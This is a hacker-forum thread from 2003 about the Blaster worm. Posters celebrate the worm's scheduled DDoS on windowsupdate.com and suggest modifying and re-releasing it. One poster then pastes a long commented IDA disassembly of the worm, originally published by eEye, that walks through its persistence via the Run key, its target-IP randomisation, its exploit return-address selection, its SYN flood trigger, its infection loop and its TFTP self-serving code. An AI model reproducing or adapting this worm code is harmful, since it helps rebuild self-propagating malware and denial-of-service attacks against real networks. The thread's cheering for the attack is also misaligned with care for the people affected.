Black_hat
Today I checked the BitDefender website and found two articles about Win32.Msblast.C and Win32.Msblast.B at these links:

http://www.bitdefender.com/bd/site/virusin...u_id=1&v_id=150
http://www.bitdefender.com/bd/site/virusin...u_id=1&v_id=149

Now tonight is an important night in Blaster's life! All infected machines start the DDoS attack on the windowsupdate.com website. Can Microsoft protect against this attack for long?! Today Microsoft's security department said they are ready for this attack.

We should wait!
Black_Hat
ssj4conejo
Kewlness, can't wait for tonight, haha, it'll be funny to see M$ down once and for all, but that is not what should've been the target; the RIAA and MPAA should've been the targets, they're today's public enemy #1.


Someone should modify the worm code and re-release it.
rinse
Cool, it'll be fun to see the outcome of this attack. I don't know why, but whoever it is that's doing this, there's something inside me that wants them to succeed.
Black_hat
Hehe
Microsoft.com and windowsupdate.com were down for 2 hours, but it's not a DDoS attack. It's just a security solution: changing the windowsupdate.com DNS server to protect against this attack. For more information visit:
http://www.informationweek.com/story/showA...icleID=13100395
http://www.iht.com/articles/106638.html
http://cbs.marketwatch.com/news/story.asp?...gle&dist=google

QUOTE

"Microsoft has taken steps to mitigate or stop the attacks," said Sean Sundwall, a Microsoft spokesman. "One of those things is we've made dormant the Web addresses to Windows Update. By removing the site it is our hope that we'll greatly reduce, or perhaps eliminate, the denial-of-service." Sundwall said that there was no evidence of any irregular activity.


But for now Windows Update is available to customers because it is redirected to windowsupdate.microsoft.com (Windows Update item).
Black_Hat
Enyo
Not to mention MSBLAST.D, aka Welchia.Worm, which removes MSBLAST and patches the system.

http://securityresponse.symantec.com/avcen...lchia.worm.html
w00dy
I wish I had found that Welchia worm sooner, before I patched my other computer. My ISP is completely dead due to the network traffic created by the Blaster worm. I would have liked to infect myself with Welchia and go and clean up the network myself.
andydis
Did I hear someone say they wish they had the MSBlaster code to modify it?

lol

.text:00401000 ;
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ; | This file is generated by The Interactive Disassembler (IDA) |
.text:00401000 ; | Copyright © 2003 by DataRescue sa/nv, <ida@datarescue.com> |
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ;
.text:00401000 ; MSBlaster worm disassembly by eEye Digital Security, Inc., August 12, 2003.
.text:00401000 ;
.text:00401000 ; Riley Hassell / Barnaby Jack / Ryan Permeh / Derek Soeder / Yuji Ukai
.text:00401000 ;
.text:00401000 ; Go to function WinMain() at 00401250 for the beginning of the worm code
.text:00401000 ; itself. Code before 00401250 and after 00402157 is standard CRT stuff and
.text:00401000 ; is therefore not commented.
.text:00401000 ;
.text:00401000 ; ---------------------------------------------------------------------------
.text:00401000 ; File Name : msblast.exe.unpacked
.text:00401000 ; Format : Portable executable for IBM PC (PE)
.text:00401000 ; Section 1. (virtual address 00001000)
.text:00401000 ; Virtual size : 00001458 ( 5208.)
.text:00401000 ; Section size in file : 00001458 ( 5208.)
.text:00401000 ; Offset to raw data for section: 00000400
.text:00401000 ; Flags 60000020: Text Executable Readable
.text:00401000 ; Alignment : 16 bytes ?
.text:00401000
.text:00401000
.text:00401000 unicode macro page,string,zero
.text:00401000 irpc c,<string>
.text:00401000 db '&c', page
.text:00401000 endm
.text:00401000 ifnb <zero>
.text:00401000 dw zero
.text:00401000 endif
.text:00401000 endm
.text:00401000
.text:00401000 model flat
.text:00401000
.text:00401000 ; ---------------------------------------------------------------------------
.text:00401000
.text:00401000 ; Segment type: Pure code
.text:00401000 ; Segment permissions: Read/Execute
.text:00401000 _text segment para public 'CODE' use32
.text:00401000 assume cs:_text
.text:00401000 ;org 401000h
.text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.text:00401000
.text:00401000 loc_401000: ; DATA XREF: sub_401020+Avo
.text:00401000 xor eax, eax
.text:00401002 inc eax
.text:00401003 mov ecx, [esp+4]
.text:00401007 test dword ptr [ecx+4], 6
.text:0040100E jz short locret_40101F
.text:00401010 mov eax, [esp+8]
.text:00401014 mov edx, [esp+10h]
.text:00401018 mov [edx], eax
.text:0040101A mov eax, 3
.text:0040101F
.text:0040101F locret_40101F: ; CODE XREF: .text:0040100E^j
.text:0040101F retn
.text:00401020
.text:00401020 ; =============== S U B R O U T I N E =======================================
.text:00401020
.text:00401020
.text:00401020 sub_401020 proc near ; CODE XREF: .text:0040110Dvp
.text:00401020 ; .text:00401138vp
.text:00401020
.text:00401020 var_8 = dword ptr -8
.text:00401020 arg_0 = dword ptr 10h
.text:00401020 arg_4 = dword ptr 14h
.text:00401020
.text:00401020 push ebx
.text:00401021 push esi
.text:00401022 push edi
.text:00401023 mov eax, [esp+arg_0]
.text:00401027 push eax
.text:00401028 push 0FFFFFFFEh
.text:0040102A push offset loc_401000
.text:0040102F push large dword ptr fs:0
.text:00401036 mov large fs:0, esp
.text:0040103D
.text:0040103D loc_40103D: ; CODE XREF: sub_401020+44vj
.text:0040103D ; sub_401020+4Avj
.text:0040103D mov eax, [esp+10h+arg_0]
.text:00401041 mov ebx, [eax+8]
.text:00401044 mov esi, [eax+0Ch]
.text:00401047 cmp esi, 0FFFFFFFFh
.text:0040104A jz short loc_40106C
.text:0040104C cmp esi, [esp+10h+arg_4]
.text:00401050 jz short loc_40106C
.text:00401052 lea esi, [esi+esi*2]
.text:00401055 mov ecx, [ebx+esi*4]
.text:00401058 mov ecx, [esp+10h+var_8]
.text:0040105C mov ecx, [eax+0Ch]
.text:0040105F cmp dword ptr [ebx+esi*4+4], 0
.text:00401064 jnz short loc_40103D
.text:00401066 call dword ptr [ebx+esi*4+8]
.text:0040106A jmp short loc_40103D
.text:0040106C ; ---------------------------------------------------------------------------
.text:0040106C
.text:0040106C loc_40106C: ; CODE XREF: sub_401020+2A^j
.text:0040106C ; sub_401020+30^j
.text:0040106C pop large dword ptr fs:0
.text:00401073 add esp, 0Ch
.text:00401076 pop edi
.text:00401077 pop esi
.text:00401078 pop ebx
.text:00401079 retn
.text:00401079 sub_401020 endp
.text:00401079
.text:0040107A
.text:0040107A ; =============== S U B R O U T I N E =======================================
.text:0040107A
.text:0040107A ; Attributes: bp-based frame
.text:0040107A
.text:0040107A sub_40107A proc near ; CODE XREF: .text:00401100vp
.text:0040107A
.text:0040107A arg_0 = dword ptr 8
.text:0040107A
.text:0040107A push ebp
.text:0040107B mov ebp, esp
.text:0040107D push ebx
.text:0040107E push esi
.text:0040107F push edi
.text:00401080 push ebp
.text:00401081 push 0
.text:00401083 push 0
.text:00401085 push offset loc_401092
.text:0040108A push [ebp+arg_0]
.text:0040108D call RtlUnwind
.text:00401092
.text:00401092 loc_401092: ; DATA XREF: sub_40107A+B^o
.text:00401092 pop ebp
.text:00401093 pop edi
.text:00401094 pop esi
.text:00401095 pop ebx
.text:00401096 mov esp, ebp
.text:00401098 pop ebp
.text:00401099 retn
.text:00401099 sub_40107A endp
.text:00401099
.text:0040109A ; ---------------------------------------------------------------------------
.text:0040109A
.text:0040109A loc_40109A: ; DATA XREF: start+10vo
.text:0040109A cld
.text:0040109B push ebp
.text:0040109C mov ebp, esp
.text:0040109E sub esp, 8
.text:004010A1 push ebx
.text:004010A2 push esi
.text:004010A3 push edi
.text:004010A4 push ebp
.text:004010A5 mov ebx, [ebp+0Ch]
.text:004010A8 mov eax, [ebp+8]
.text:004010AB mov dword_404030, eax
.text:004010B0 mov dword_404034, ebx
.text:004010B6 test dword ptr [eax+4], 6
.text:004010BD jnz short loc_401131
.text:004010BF mov [ebp-8], eax
.text:004010C2 mov eax, [ebp+10h]
.text:004010C5 mov [ebp-4], eax
.text:004010C8 mov dword_404034, eax
.text:004010CD lea eax, [ebp-8]
.text:004010D0 mov [ebx-4], eax
.text:004010D3 mov esi, [ebx+0Ch]
.text:004010D6 mov edi, [ebx+8]
.text:004010D9
.text:004010D9 loc_4010D9: ; CODE XREF: .text:0040112Bvj
.text:004010D9 cmp esi, 0FFFFFFFFh
.text:004010DC jz short loc_401140
.text:004010DE lea ecx, [esi+esi*2]
.text:004010E1 cmp dword ptr [edi+ecx*4+4], 0
.text:004010E6 jz short loc_401122
.text:004010E8 push esi
.text:004010E9 push ebp
.text:004010EA lea ebp, [ebx+10h]
.text:004010ED call dword ptr [edi+ecx*4+4]
.text:004010F1 pop ebp
.text:004010F2 pop esi
.text:004010F3 mov ebx, [ebp+0Ch]
.text:004010F6 or eax, eax
.text:004010F8 jz short loc_401122
.text:004010FA js short loc_40112D
.text:004010FC mov edi, [ebx+8]
.text:004010FF push ebx
.text:00401100 call sub_40107A
.text:00401105 add esp, 4
.text:00401108 lea ebp, [ebx+10h]
.text:0040110B push esi
.text:0040110C push ebx
.text:0040110D call sub_401020
.text:00401112 add esp, 8
.text:00401115 lea ecx, [esi+esi*2]
.text:00401118 mov eax, [edi+ecx*4]
.text:0040111B mov eax, [ebx+0Ch]
.text:0040111E call dword ptr [edi+ecx*4+8]
.text:00401122
.text:00401122 loc_401122: ; CODE XREF: .text:004010E6^j
.text:00401122 ; .text:004010F8^j
.text:00401122 mov edi, [ebx+8]
.text:00401125 lea ecx, [esi+esi*2]
.text:00401128 mov esi, [edi+ecx*4]
.text:0040112B jmp short loc_4010D9
.text:0040112D ; ---------------------------------------------------------------------------
.text:0040112D
.text:0040112D loc_40112D: ; CODE XREF: .text:004010FA^j
.text:0040112D xor eax, eax
.text:0040112F jmp short loc_4011A2
.text:00401131 ; ---------------------------------------------------------------------------
.text:00401131
.text:00401131 loc_401131: ; CODE XREF: .text:004010BD^j
.text:00401131 push ebp
.text:00401132 lea ebp, [ebx+10h]
.text:00401135 push 0FFFFFFFFh
.text:00401137 push ebx
.text:00401138 call sub_401020
.text:0040113D add esp, 0Ch
.text:00401140
.text:00401140 loc_401140: ; CODE XREF: .text:004010DC^j
.text:00401140 push 0
.text:00401142 mov dword_404010, 0Bh
.text:0040114C push 0Bh
.text:0040114E call signal
.text:00401153 add esp, 8
.text:00401156 or eax, eax
.text:00401158 jnz short loc_40117B
.text:0040115A push 0
.text:0040115C mov dword_404010, 8
.text:00401166 push 8
.text:00401168 call signal
.text:0040116D add esp, 8
.text:00401170 or eax, eax
.text:00401172 jnz short loc_40117B
.text:00401174 mov eax, 1
.text:00401179 jmp short loc_4011A2
.text:0040117B ; ---------------------------------------------------------------------------
.text:0040117B
.text:0040117B loc_40117B: ; CODE XREF: .text:00401158^j
.text:0040117B ; .text:00401172^j
.text:0040117B cmp eax, 0FFFFFFFFh
.text:0040117E jz short loc_4011AA
.text:00401180 push eax
.text:00401181 push dword_404010
.text:00401187 call signal
.text:0040118C add esp, 8
.text:0040118F push dword_404010
.text:00401195 call raise
.text:0040119A add esp, 4
.text:0040119D mov eax, 1
.text:004011A2
.text:004011A2 loc_4011A2: ; CODE XREF: .text:0040112F^j
.text:004011A2 ; .text:00401179^j ...
.text:004011A2 pop ebp
.text:004011A3 pop edi
.text:004011A4 pop esi
.text:004011A5 pop ebx
.text:004011A6 mov esp, ebp
.text:004011A8 pop ebp
.text:004011A9 retn
.text:004011AA ; ---------------------------------------------------------------------------
.text:004011AA
.text:004011AA loc_4011AA: ; CODE XREF: .text:0040117E^j
.text:004011AA cmp dword_40402C, 0
.text:004011B1 jnz short loc_4011BA
.text:004011B3 mov eax, 1
.text:004011B8 jmp short loc_4011A2
.text:004011BA ; ---------------------------------------------------------------------------
.text:004011BA
.text:004011BA loc_4011BA: ; CODE XREF: .text:004011B1^j
.text:004011BA mov eax, dword_40402C
.text:004011BF push 0Bh
.text:004011C1 jmp eax
.text:004011C3 ; ---------------------------------------------------------------------------
.text:004011C3 pop eax
.text:004011C4 mov eax, 1
.text:004011C9 jmp short loc_4011A2
.text:004011CB
.text:004011CB ; =============== S U B R O U T I N E =======================================
.text:004011CB
.text:004011CB ; Attributes: bp-based frame
.text:004011CB
.text:004011CB public start
.text:004011CB start proc near
.text:004011CB
.text:004011CB var_30 = word ptr -30h
.text:004011CB var_18 = dword ptr -18h
.text:004011CB var_4 = dword ptr -4
.text:004011CB
.text:004011CB mov eax, large fs:0
.text:004011D1 push ebp
.text:004011D2 mov ebp, esp
.text:004011D4 push 0FFFFFFFFh
.text:004011D6 push offset unk_40401C
.text:004011DB push offset loc_40109A
.text:004011E0 push eax
.text:004011E1 mov large fs:0, esp
.text:004011E8 sub esp, 10h
.text:004011EB push ebx
.text:004011EC push esi
.text:004011ED push edi
.text:004011EE mov [ebp+var_18], esp
.text:004011F1 push eax
.text:004011F2 fnstcw [esp+30h+var_30]
.text:004011F5 or word ptr [esp], 300h
.text:004011FB fldcw [esp+30h+var_30]
.text:004011FE add esp, 4
.text:00401201 push 0
.text:00401203 push 0
.text:00401205 push offset dword_404028
.text:0040120A push offset dword_404024
.text:0040120F push offset dword_404020
.text:00401214 call __GetMainArgs
.text:00401219 push dword_404028
.text:0040121F push dword_404024
.text:00401225 push dword_404020
.text:0040122B mov dword_404014, esp
.text:00401231 call sub_402254
.text:00401236 add esp, 18h
.text:00401239 xor ecx, ecx
.text:0040123B mov [ebp+var_4], ecx
.text:0040123E push eax
.text:0040123F call exit
.text:00401244 leave
.text:00401245 retn
.text:00401245 start endp
.text:00401245
.text:00401245 ; ---------------------------------------------------------------------------
.text:00401246 align 4
.text:00401248 mov large fs:0, eax
.text:0040124E retn
.text:0040124E ; ---------------------------------------------------------------------------
.text:0040124F align 4
.text:00401250
.text:00401250 ; =============== S U B R O U T I N E =======================================
.text:00401250
.text:00401250 ; Attributes: bp-based frame
.text:00401250
.text:00401250 WinMain proc near ; CODE XREF: sub_402254+5Cvp
.text:00401250
.text:00401250 in = in_addr ptr -3ACh
.text:00401250 var_3A8 = dword ptr -3A8h
.text:00401250 var_3A4 = dword ptr -3A4h
.text:00401250 name = byte ptr -3A0h
.text:00401250 WSAData = WSAData ptr -1A0h
.text:00401250 szMonth = byte ptr -10h
.text:00401250 szDay = byte ptr -0Ch
.text:00401250 hKey = dword ptr -8
.text:00401250 ThreadId = dword ptr -4
.text:00401250
.text:00401250 push ebp
.text:00401251 mov ebp, esp
.text:00401253 sub esp, 3ACh
.text:00401259 push esi
.text:0040125A push edi
.text:0040125B xor esi, esi
.text:0040125D
.text:0040125D ; Create/open HKLM\Software\Microsoft\Windows\CurrentVersion\Run
.text:0040125D
.text:0040125D push 0 ; lpdwDisposition
.text:0040125F lea eax, [ebp+hKey]
.text:00401262 push eax ; phkResult
.text:00401263 push 0 ; lpSecurityAttributes
.text:00401265 push 0F003Fh ; samDesired
.text:0040126A push 0 ; dwOptions
.text:0040126C push 0 ; lpClass
.text:0040126E push 0 ; Reserved
.text:00401270 push offset aSoftwareMicros ; lpSubKey
.text:00401275 push 80000002h ; hKey = HKEY_LOCAL_MACHINE
.text:0040127A call RegCreateKeyExA
.text:0040127F
.text:0040127F ; Create "windows auto update" string value = "msblast.exe"
.text:0040127F
.text:0040127F push 32h ; cbData (some extra here after null term)
.text:00401281 push offset aMsblast_exe ; lpData
.text:00401286 push 1 ; dwType = REG_SZ
.text:00401288 push 0 ; Reserved
.text:0040128A push offset aWindowsAutoUpd ; lpValueName
.text:0040128F push [ebp+hKey] ; hKey
.text:00401292 call RegSetValueExA
.text:00401297 push [ebp+hKey] ; hKey
.text:0040129A call RegCloseKey
.text:0040129F
.text:0040129F ; Create "BILLY" named mutex to prevent multiple infection
.text:0040129F
.text:0040129F push offset aBilly ; lpName
.text:004012A4 push 1 ; bInitialOwner
.text:004012A6 push 0 ; lpMutexAttributes
.text:004012A8 call CreateMutexA
.text:004012AD call GetLastError
.text:004012B2 cmp eax, 0B7h ; 183 (0xB7): mutex already exists
.text:004012B7 jnz short loc_4012C0 ; if BILLY mutex does not exist... continue here
.text:004012B9 push 0 ; uExitCode
.text:004012BB call ExitProcess
.text:004012C0
.text:004012C0 ; Initialize Winsock
.text:004012C0
.text:004012C0 loc_4012C0: ; CODE XREF: WinMain+67^j
.text:004012C0 lea eax, [ebp+WSAData] ; if BILLY mutex does not exist... continue here
.text:004012C6 push eax ; lpWSAData
.text:004012C7 push 202h ; wVersionRequested (2.2)
.text:004012CC call WSAStartup
.text:004012D1 or eax, eax
.text:004012D3 jz short loc_401304
.text:004012D5 lea eax, [ebp+WSAData]
.text:004012DB push eax ; lpWSAData
.text:004012DC push 101h ; wVersionRequested (1.1)
.text:004012E1 call WSAStartup
.text:004012E6 or eax, eax
.text:004012E8 jz short loc_401304
.text:004012EA lea eax, [ebp+WSAData]
.text:004012F0 push eax ; lpWSAData
.text:004012F1 push 1 ; wVersionRequested (1.0)
.text:004012F3 call WSAStartup
.text:004012F8 or eax, eax
.text:004012FA jz short loc_401304
.text:004012FC or eax, 0FFFFFFFFh
.text:004012FF jmp loc_401570 ; return
.text:00401304 ; ---------------------------------------------------------------------------
.text:00401304
.text:00401304 loc_401304: ; CODE XREF: WinMain+83^j
.text:00401304 ; WinMain+98^j ...
.text:00401304 push 104h ; nSize
.text:00401309 push offset Filename ; lpFilename
.text:0040130E push 0 ; hModule
.text:00401310 call GetModuleFileNameA ; get worm executable's file name (for fopen()'ing later)
.text:00401315
.text:00401315 ; Wait until host is connected to Internet
.text:00401315
.text:00401315 loc_401315: ; CODE XREF: WinMain+DEvj
.text:00401315 push 0 ; sleep 20 second intervals until connected to Internet
.text:00401317 lea eax, [ebp+ThreadId]
.text:0040131A push eax
.text:0040131B call InternetGetConnectedState
.text:00401320 or eax, eax
.text:00401322 jnz short loc_401330 ; start at beginning of subnet (x.x.x.0)
.text:00401324 push 4E20h ; dwMilliseconds = 20000 (20 seconds)
.text:00401329 call Sleep
.text:0040132E jmp short loc_401315 ; sleep 20 second intervals until connected to Internet
.text:00401330 ; ---------------------------------------------------------------------------
.text:00401330
.text:00401330 ; Get IP address and selectively apply randomization
.text:00401330
.text:00401330 loc_401330: ; CODE XREF: WinMain+D2^j
.text:00401330 and ds:octet4, 0 ; start at beginning of subnet (x.x.x.0)
.text:00401337 call GetTickCount
.text:0040133C push eax
.text:0040133D call srand ; seed random number generator with GetTickCount()
.text:00401342 pop ecx
.text:00401343 call rand
.text:00401348 mov ecx, 0FEh
.text:0040134D cdq
.text:0040134E idiv ecx
.text:00401350 mov edi, edx
.text:00401352 inc edi
.text:00401353 mov ds:synspoofoctet1, edi ; rand() % 254
.text:00401353 ; make first and second octets of spoofed SYN
.text:00401353 ; source address random at first -- if we can't
.text:00401353 ; get our local IP, then leave these random;
.text:00401353 ; otherwise, replace them with our local IP's
.text:00401353 ; first and second octets
.text:00401359 call rand
.text:0040135E mov ecx, 0FEh
.text:00401363 cdq
.text:00401364 idiv ecx
.text:00401366 mov ds:synspoofoctet2, edx ; rand() % 254
.text:0040136C push 200h ; namelen
.text:00401371 lea eax, [ebp+name]
.text:00401377 push eax ; name
.text:00401378 call gethostname ; get name of local machine for IP lookup
.text:0040137D cmp eax, 0FFFFFFFFh
.text:00401380 jz loc_401476 ; did gethostname() fail?
.text:00401386 lea eax, [ebp+name]
.text:0040138C push eax ; name
.text:0040138D call gethostbyname ; now that we have machine name, get local IP address
.text:00401392 mov [ebp+var_3A4], eax
.text:00401398 or eax, eax
.text:0040139A jz loc_401476 ; did gethostbyname() fail?
.text:004013A0 mov ecx, [eax+0Ch]
.text:004013A3 cmp dword ptr [ecx], 0
.text:004013A6 jz loc_401476 ; is *h_addr_list NULL? (couldn't get a local IP address)
.text:004013AC push 4 ; sizeof(struct in_addr) = 4
.text:004013AE mov eax, [eax+0Ch]
.text:004013B1 push dword ptr [eax] ; use ptr to first address in h_addr_list as source
.text:004013B3 lea eax, [ebp+in]
.text:004013B9 push eax ; dest is &[EBP+in], which is struct in_addr
.text:004013BA call memcpy
.text:004013BF push dword ptr [ebp+in.S_un] ; in
.text:004013C5 call inet_ntoa
.text:004013CA push eax
.text:004013CB push offset aS ; "%s"
.text:004013D0 lea edi, [ebp+name]
.text:004013D6 push edi
.text:004013D7 call sprintf
.text:004013DC push offset a_ ; "."
.text:004013E1 lea eax, [ebp+name]
.text:004013E7 push eax
.text:004013E8 call strtok ; get first octet from IP address string ("." is delimiter)
.text:004013ED mov [ebp+var_3A8], eax
.text:004013F3 push eax
.text:004013F4 call atoi
.text:004013F9 mov ds:octet1, eax
.text:004013FE push offset a_ ; "."
.text:00401403 push 0
.text:00401405 call strtok ; get second octet
.text:0040140A mov [ebp+var_3A8], eax
.text:00401410 push eax
.text:00401411 call atoi
.text:00401416 mov ds:octet2, eax
.text:0040141B push offset a_ ; "."
.text:00401420 push 0
.text:00401422 call strtok ; get third octet
.text:00401427 mov [ebp+var_3A8], eax
.text:0040142D push eax
.text:0040142E call atoi
.text:00401433 add esp, 3Ch
.text:00401436 mov ds:octet3, eax
.text:0040143B cmp eax, 14h
.text:0040143E jle short loc_40145F ; third octet <= 20?
.text:00401440 call GetTickCount
.text:00401445 push eax
.text:00401446 call srand
.text:0040144B pop ecx
.text:0040144C call rand
.text:00401451 mov ecx, 14h
.text:00401456 cdq
.text:00401457 idiv ecx
.text:00401459 sub ds:octet3, edx ; subtract (rand() % 20) from 3rd octet (if it's > 20)
.text:0040145F
.text:0040145F loc_40145F: ; CODE XREF: WinMain+1EE^j
.text:0040145F mov eax, ds:octet1 ; use first and second octets of local IP for
.text:0040145F ; spoofed source address of SYN packets
.text:0040145F ; (this code will only be reached if we were
.text:0040145F ; able to get the local machine's IP address)
.text:00401464 mov ds:synspoofoctet1, eax
.text:00401469 mov eax, ds:octet2
.text:0040146E mov ds:synspoofoctet2, eax
.text:00401473 xor esi, esi
.text:00401475 inc esi ; ESI = 1
.text:00401476
.text:00401476 loc_401476: ; CODE XREF: WinMain+130^j
.text:00401476 ; WinMain+14A^j ...
.text:00401476 call GetTickCount ; jump ahead to here if unable to get local IP
.text:00401476 ; (note that ESI=0 if we jumped here after failing
.text:00401476 ; to get our local IP, meaning that, in that case,
.text:00401476 ; we'll always randomize the initial target IP)
.text:0040147B push eax
.text:0040147C call srand
.text:00401481 pop ecx
.text:00401482 call rand
.text:00401487 mov ecx, 14h
.text:0040148C cdq
.text:0040148D idiv ecx
.text:0040148F cmp edx, 0Ch ; EDX = random number from 0..19
.text:00401492 jge short loc_401496 ; ESI=1: 8/20 (40%) chance
.text:00401494 xor esi, esi ; ESI=0: 12/20 (60%) chance
.text:00401496
.text:00401496 ; Randomly decide which return address to use in the exploit
.text:00401496 ; 80%: dwWhichRetAddr = 1 -- Windows XP address (0100139Dh)
.text:00401496 ; 20%: dwWhichRetAddr = 2 -- Windows 2000 address (0018759Fh)
.text:00401496
.text:00401496 loc_401496: ; CODE XREF: WinMain+242^j
.text:00401496 mov ds:dwWhichRetAddr, 1
.text:004014A0 call rand
.text:004014A5 mov ecx, 0Ah
.text:004014AA cdq
.text:004014AB idiv ecx
.text:004014AD cmp edx, 7 ; EDX = rand() % 10
.text:004014B0 jle short loc_4014BC ; 8/10 (80%) chance: leave dwWhichRetAddr = 1 (XP ret addr)
.text:004014B2 mov ds:dwWhichRetAddr, 2 ; 2/10 (20%) chance: set to 2 (Windows 2000 ret addr)
.text:004014BC
.text:004014BC ; 12/20 (60%) chance that the 1st, 2nd, and 3rd octets will be randomized:
.text:004014BC ; 1st: 1..254
.text:004014BC ; 2nd: 0..253
.text:004014BC ; 3rd: 0..253
.text:004014BC
.text:004014BC loc_4014BC: ; CODE XREF: WinMain+260^j
.text:004014BC or esi, esi
.text:004014BE jnz short loc_4014FC ; if ESI=1 (40% chance), DON'T randomize first 3 octets
.text:004014C0 call rand
.text:004014C5 mov ecx, 0FEh
.text:004014CA cdq
.text:004014CB idiv ecx
.text:004014CD mov edi, edx
.text:004014CF inc edi
.text:004014D0 mov ds:octet1, edi ; (rand() % 254) + 1
.text:004014D6 call rand
.text:004014DB mov ecx, 0FEh
.text:004014E0 cdq
.text:004014E1 idiv ecx
.text:004014E3 mov ds:octet2, edx ; rand() % 254
.text:004014E9 call rand
.text:004014EE mov ecx, 0FEh
.text:004014F3 cdq
.text:004014F4 idiv ecx
.text:004014F6 mov ds:octet3, edx ; rand() % 254
.text:004014FC
.text:004014FC ; Check date to decide whether or not to SYN flood windowsupdate.com
.text:004014FC
.text:004014FC loc_4014FC: ; CODE XREF: WinMain+26E^j
.text:004014FC push 3 ; cchDate
.text:004014FE lea eax, [ebp+szDay]
.text:00401501 push eax ; lpDateStr
.text:00401502 push offset aD ; lpFormat = "d"
.text:00401507 push 0 ; lpDate
.text:00401509 push 0 ; dwFlags
.text:0040150B push 409h ; Locale
.text:00401510 call GetDateFormatA
.text:00401515 push 3 ; cchDate
.text:00401517 lea eax, [ebp+szMonth]
.text:0040151A push eax ; lpDateStr
.text:0040151B push offset aM ; lpFormat = "M"
.text:00401520 push 0 ; lpDate
.text:00401522 push 0 ; dwFlags
.text:00401524 push 409h ; Locale
.text:00401529 call GetDateFormatA
.text:0040152E lea eax, [ebp+szDay]
.text:00401531 push eax
.text:00401532 call atoi
.text:00401537 pop ecx
.text:00401538 cmp eax, 0Fh ; if day is after 15th...
.text:0040153B jg short loc_40154C ; ...then SYN flood windowsupdate.com:80
.text:0040153D lea edi, [ebp+szMonth]
.text:00401540 push edi
.text:00401541 call atoi
.text:00401546 pop ecx
.text:00401547 cmp eax, 8 ; ...or month is after August (8)...
.text:0040154A jle short loc_401562 ; infinitely call infection loop function
.text:0040154C
.text:0040154C ; If day is > 15 or month > 8 (August), create SYN flood thread
.text:0040154C
.text:0040154C loc_40154C: ; CODE XREF: WinMain+2EB^j
.text:0040154C lea eax, [ebp+ThreadId] ; ...then SYN flood windowsupdate.com:80
.text:0040154F push eax ; lpThreadId
.text:00401550 push 0 ; dwCreationFlags
.text:00401552 push 0 ; lpParameter
.text:00401554 push offset WUSYNFloodThread ; lpStartAddress
.text:00401559 push 0 ; dwStackSize
.text:0040155B push 0 ; lpThreadAttributes
.text:0040155D call CreateThread
.text:00401562
.text:00401562 ; Infect sequential IP addresses endlessly, 20 hosts at a time
.text:00401562
.text:00401562 loc_401562: ; CODE XREF: WinMain+2FA^j
.text:00401562 ; WinMain+317vj
.text:00401562 call infect20Hosts ; infinitely call infection loop function
.text:00401567 jmp short loc_401562 ; infinitely call infection loop function
.text:00401569 ; ---------------------------------------------------------------------------
.text:00401569 call WSACleanup
.text:0040156E xor eax, eax
.text:00401570
.text:00401570 loc_401570: ; CODE XREF: WinMain+AF^j
.text:00401570 pop edi ; return
.text:00401571 pop esi
.text:00401572 leave
.text:00401573 retn 10h
.text:00401573 WinMain endp
.text:00401573
.text:00401576
.text:00401576 ; =============== S U B R O U T I N E =======================================
.text:00401576
.text:00401576 ; Attributes: bp-based frame
.text:00401576
.text:00401576 TFTPServerThread proc near ; DATA XREF: infectTarget+39Fvo
.text:00401576
.text:00401576 buf = byte ptr -42Ch
.text:00401576 name = sockaddr ptr -228h
.text:00401576 to = sockaddr ptr -218h
.text:00401576 tolen = dword ptr -208h
.text:00401576 var_204 = word ptr -204h
.text:00401576 var_202 = word ptr -202h
.text:00401576 var_200 = byte ptr -200h
.text:00401576
.text:00401576 push ebp
.text:00401577 mov ebp, esp
.text:00401579 sub esp, 42Ch
.text:0040157F push ebx
.text:00401580 push esi
.text:00401581 push edi
.text:00401582 mov dwTFTPInProgress, 1
.text:0040158C
.text:0040158C loc_40158C: ; CODE XREF: TFTPServerThread+16Fvj
.text:0040158C push 0 ; protocol = IPPROTO_IP
.text:0040158E push 2 ; type = SOCK_DGRAM
.text:00401590 push 2 ; af = AF_INET
.text:00401592 call socket
.text:00401597 mov ds:s, eax
.text:0040159C cmp eax, 0FFFFFFFFh
.text:0040159F jz loc_4016EA
.text:004015A5 push 10h
.text:004015A7 push 0
.text:004015A9 lea eax, [ebp+name]
.text:004015AF push eax
.text:004015B0 call memset
.text:004015B5 add esp, 0Ch
.text:004015B8 mov [ebp+name.sa_family], 2
.text:004015C1 push 45h ; hostshort = 69 (TFTP)
.text:004015C3 call htons
.text:004015C8 mov edx, eax
.text:004015CA mov word ptr [ebp+name.sa_data], dx
.text:004015D1 and dword ptr [ebp+name.sa_data+2], 0
.text:004015D8 push 10h ; namelen
.text:004015DA lea eax, [ebp+name]
.text:004015E0 push eax ; name
.text:004015E1 push ds:s ; s
.text:004015E7 call bind
.text:004015EC or eax, eax
.text:004015EE jnz loc_4016EA
.text:004015F4 mov [ebp+tolen], 10h
.text:004015FE lea eax, [ebp+tolen]
.text:00401604 push eax ; fromlen
.text:00401605 lea eax, [ebp+to]
.text:0040160B push eax ; from
.text:0040160C push 0 ; flags
.text:0040160E push 204h ; len
.text:00401613 lea eax, [ebp+buf]
.text:00401619 push eax ; buf
.text:0040161A push ds:s ; s
.text:00401620 call recvfrom
.text:00401625 cmp eax, 1
.text:00401628 jl loc_4016EA
.text:0040162E xor ebx, ebx
.text:00401630 push offset aRb ; "rb"
.text:00401635 push offset Filename ; 260 (104h) = MAX_PATH
.text:0040163A call fopen
.text:0040163F add esp, 8
.text:00401642 mov esi, eax
.text:00401644 or eax, eax
.text:00401646 jz loc_4016EA
.text:0040164C
.text:0040164C loc_40164C: ; CODE XREF: TFTPServerThread+15Dvj
.text:0040164C inc ebx
.text:0040164D push 3 ; hostshort
.text:0040164F call htons
.text:00401654 mov edx, eax
.text:00401656 mov [ebp+var_204], dx ; TFTP packet format: (all network order)
.text:00401656 ; 0000 WORD = 3?
.text:00401656 ; 0002 WORD chunk number (starts at 1)
.text:00401656 ; 0004 start of data
.text:0040165D mov eax, ebx
.text:0040165F and eax, 0FFFFh
.text:00401664 push eax ; hostshort
.text:00401665 call htons
.text:0040166A mov edx, eax
.text:0040166C mov [ebp+var_202], dx
.text:00401673 push esi
.text:00401674 push 200h
.text:00401679 push 1
.text:0040167B lea eax, [ebp+var_200]
.text:00401681 push eax
.text:00401682 call fread
.text:00401687 add esp, 10h
.text:0040168A mov edi, eax ; length actually read
.text:0040168C add edi, 4 ; + 4 (for TFTP header)
.text:0040168F push [ebp+tolen] ; tolen
